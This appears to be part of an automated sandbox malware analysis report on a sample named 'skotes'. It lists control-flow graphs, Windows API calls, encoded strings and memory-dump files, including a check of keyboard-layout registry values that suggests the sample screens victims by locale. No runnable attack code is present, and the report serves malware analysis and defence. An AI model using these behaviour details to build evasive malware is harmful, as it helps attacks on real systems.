                                                                                                                                                                                                                                          control_flow_graph 1685 b76020-b7619d call b8e150 call b880c0 * 5 RegOpenKeyExA 1698 b761a3-b76233 call ba40f0 1685->1698 1699 b764b1-b764ba 1685->1699 1729 b7649f-b764ab 1698->1729 1730 b76239-b7623d 1698->1730 1700 b764e7-b764f0 1699->1700 1701 b764bc-b764c7 1699->1701 1705 b764f2-b764fd 1700->1705 1706 b7651d-b76526 1700->1706 1703 b764dd-b764e4 call b8d663 1701->1703 1704 b764c9-b764d7 1701->1704 1703->1700 1704->1703 1708 b765d7-b765df call ba6c6a 1704->1708 1710 b76513-b7651a call b8d663 1705->1710 1711 b764ff-b7650d 1705->1711 1712 b76553-b7655c 1706->1712 1713 b76528-b76533 1706->1713 1710->1706 1711->1708 1711->1710 1715 b76585-b7658e 1712->1715 1716 b7655e-b76569 1712->1716 1720 b76535-b76543 1713->1720 1721 b76549-b76550 call b8d663 1713->1721 1726 b76590-b7659f 1715->1726 1727 b765bb-b765d6 call b8cff1 1715->1727 1724 b7657b-b76582 call b8d663 1716->1724 1725 b7656b-b76579 1716->1725 1720->1708 1720->1721 1721->1712 1724->1715 1725->1708 1725->1724 1733 b765b1-b765b8 call b8d663 1726->1733 1734 b765a1-b765af 1726->1734 1729->1699 1736 b76243-b76279 RegEnumValueA 1730->1736 1737 b76499 1730->1737 1733->1727 1734->1708 1734->1733 1739 b76486-b7648d 1736->1739 1740 b7627f-b7629e 1736->1740 1737->1729 1739->1736 1745 b76493 1739->1745 1744 b762a0-b762a5 1740->1744 1744->1744 1747 b762a7-b762fb call b880c0 call b87a00 * 2 call b75d50 1744->1747 1745->1737 1747->1739
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00B7617D
                                                                                                                                                                                                                                          • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00B76271
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnumOpenValue
                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                          • API String ID: 2571532894-3963862150
                                                                                                                                                                                                                                          • Opcode ID: 399df9904393a92b15a5b0b8f16fc0561167006879c33d4a0afa3da5e3b5bcba
                                                                                                                                                                                                                                          • Instruction ID: 189ca7125f3d1b193178d6da0bb7650f186c0c176f26771b5af944c7b3344133
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 399df9904393a92b15a5b0b8f16fc0561167006879c33d4a0afa3da5e3b5bcba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFB1CE719002689BEB24DB24CC84BDEB7B9EF15300F5442D9E118E7291DB74AFA8CF95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1825 b77d30-b77db2 call ba40f0 1829 b78356-b78373 call b8cff1 1825->1829 1830 b77db8-b77de0 call b87a00 call b75c10 1825->1830 1837 b77de4-b77e06 call b87a00 call b75c10 1830->1837 1838 b77de2 1830->1838 1843 b77e0a-b77e23 1837->1843 1844 b77e08 1837->1844 1838->1837 1847 b77e25-b77e34 1843->1847 1848 b77e54-b77e7f 1843->1848 1844->1843 1849 b77e36-b77e44 1847->1849 1850 b77e4a-b77e51 call b8d663 1847->1850 1851 b77e81-b77e90 1848->1851 1852 b77eb0-b77ed1 1848->1852 1849->1850 1853 b78374 call ba6c6a 1849->1853 1850->1848 1855 b77ea6-b77ead call b8d663 1851->1855 1856 b77e92-b77ea0 1851->1856 1857 b77ed7-b77edc 1852->1857 1858 b77ed3-b77ed5 GetNativeSystemInfo 1852->1858 1866 b78379-b7837f call ba6c6a 1853->1866 1855->1852 1856->1853 1856->1855 1859 b77edd-b77ee6 1857->1859 1858->1859 1864 b77f04-b77f07 1859->1864 1865 b77ee8-b77eef 1859->1865 1870 b782f7-b782fa 1864->1870 1871 b77f0d-b77f16 1864->1871 1868 b77ef5-b77eff 1865->1868 1869 b78351 1865->1869 1873 b7834c 1868->1873 1869->1829 1870->1869 1876 b782fc-b78305 1870->1876 1874 b77f29-b77f2c 1871->1874 1875 b77f18-b77f24 1871->1875 1873->1869 1878 b782d4-b782d6 1874->1878 1879 b77f32-b77f39 1874->1879 1875->1873 1880 b78307-b7830b 1876->1880 1881 b7832c-b7832f 1876->1881 1882 b782e4-b782e7 1878->1882 1883 b782d8-b782e2 1878->1883 1884 b77f3f-b77f9b call b87a00 call b75c10 call b87a00 call b75c10 call b75d50 1879->1884 1885 b78019-b782bd call b87a00 call b75c10 call b87a00 call b75c10 call b75d50 call b87a00 call b75c10 call b75730 call b87a00 call b75c10 call b87a00 call b75c10 call b75d50 call b87a00 call b75c10 call b75730 call b87a00 call b75c10 call b87a00 call b75c10 call b75d50 call b87a00 call b75c10 call b75730 call b87a00 call b75c10 call b87a00 call b75c10 call b75d50 call b87a00 call b75c10 call b75730 1879->1885 1886 b78320-b7832a 1880->1886 1887 b7830d-b78312 1880->1887 1888 b78331-b7833b 1881->1888 1889 b7833d-b78349 1881->1889 1882->1869 1891 b782e9-b782f5 1882->1891 1883->1873 1910 b77fa0-b77fa7 1884->1910 1922 b782c3-b782cc 1885->1922 1886->1869 1887->1886 1893 b78314-b7831e 1887->1893 1888->1869 1889->1873 1891->1873 1893->1869 1912 b77fab-b77fcb call ba8bbe 1910->1912 1913 b77fa9 1910->1913 1919 b78002-b78004 1912->1919 1920 b77fcd-b77fdc 1912->1920 1913->1912 1919->1922 1923 b7800a-b78014 1919->1923 1925 b77ff2-b77fff call b8d663 1920->1925 1926 b77fde-b77fec 1920->1926 1922->1870 1928 b782ce 1922->1928 1923->1922 1925->1919 1926->1866 1926->1925 1928->1878
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B77ED3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID: (q$JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                                                                                                                          • API String ID: 1721193555-4229216341
                                                                                                                                                                                                                                          • Opcode ID: 6c8434d2574a466c80c3b17d9bd82bfaf74fee6d943bfc665db0f71ebf36556c
                                                                                                                                                                                                                                          • Instruction ID: 8c631e9d16ec98da8333eeb457804ae3080cef46e8fe5dde691aa9e881fcec1f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c8434d2574a466c80c3b17d9bd82bfaf74fee6d943bfc665db0f71ebf36556c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EE1E770E002449BDB25BB28CD5B79D7BE1EB41724F9482D9E4296B3D2EF754E8087C2

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1979 bb1abc-bb1aec call bb180a 1982 bb1aee-bb1af9 call ba75e3 1979->1982 1983 bb1b07-bb1b13 call babf3a 1979->1983 1988 bb1afb-bb1b02 call ba75f6 1982->1988 1989 bb1b2c-bb1b75 call bb1775 1983->1989 1990 bb1b15-bb1b2a call ba75e3 call ba75f6 1983->1990 2000 bb1de1-bb1de5 1988->2000 1998 bb1be2-bb1beb GetFileType 1989->1998 1999 bb1b77-bb1b80 1989->1999 1990->1988 2001 bb1bed-bb1c1e call ba75c0 1998->2001 2002 bb1c34-bb1c37 1998->2002 2004 bb1b82-bb1b86 1999->2004 2005 bb1bb7-bb1bdd call ba75c0 1999->2005 2001->1988 2027 bb1c24-bb1c2f call ba75f6 2001->2027 2007 bb1c39-bb1c3e 2002->2007 2008 bb1c40-bb1c46 2002->2008 2004->2005 2006 bb1b88-bb1bb5 call bb1775 2004->2006 2005->1988 2006->1998 2006->2005 2011 bb1c4a-bb1c98 call babe85 2007->2011 2008->2011 2013 bb1c48 2008->2013 2021 bb1c9a-bb1ca6 call bb1984 2011->2021 2022 bb1cb7-bb1cdf call bb1522 2011->2022 2013->2011 2021->2022 2029 bb1ca8 2021->2029 2031 bb1ce1-bb1ce2 2022->2031 2032 bb1ce4-bb1d25 2022->2032 2027->1988 2033 bb1caa-bb1cb2 call baaf48 2029->2033 2031->2033 2035 bb1d27-bb1d2b 2032->2035 2036 bb1d46-bb1d54 2032->2036 2033->2000 2035->2036 2040 bb1d2d-bb1d41 2035->2040 2037 bb1d5a-bb1d5e 2036->2037 2038 bb1ddf 2036->2038 2037->2038 2041 bb1d60-bb1d93 call bb1775 2037->2041 2038->2000 2040->2036 2046 bb1dc7-bb1ddb 2041->2046 2047 bb1d95-bb1dc1 call ba75c0 call bac04d 2041->2047 2046->2038 2047->2046
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00BB1775: CreateFileW.KERNEL32(00000000,00000000,?,00BB1B65,?,?,00000000,?,00BB1B65,00000000,0000000C), ref: 00BB1792
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00BB1BD7
                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00BB1BE3
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00BB1BF6
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00BB1D9C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
